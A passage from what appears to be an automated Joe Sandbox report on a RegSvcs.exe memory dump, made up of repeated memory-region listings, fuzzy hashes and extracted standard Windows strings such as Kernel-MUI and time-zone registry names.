                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
Memory Dump Source
• Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
• Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 009887E6
                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 009889FC
                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00988827
                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00988914
                                                                                                              • WindowsExcludedProcs, xrefs: 009887C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: _wcspbrk
                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: _wcsnlen
                                                                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              APIs
                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009B3F12
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009B3F4A
                                                                                                              • ExecuteOptions, xrefs: 009B3F04
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 009BE345
                                                                                                              • Execute=1, xrefs: 009B3F5E
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009B3EC4
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009B3F75
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009BE2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
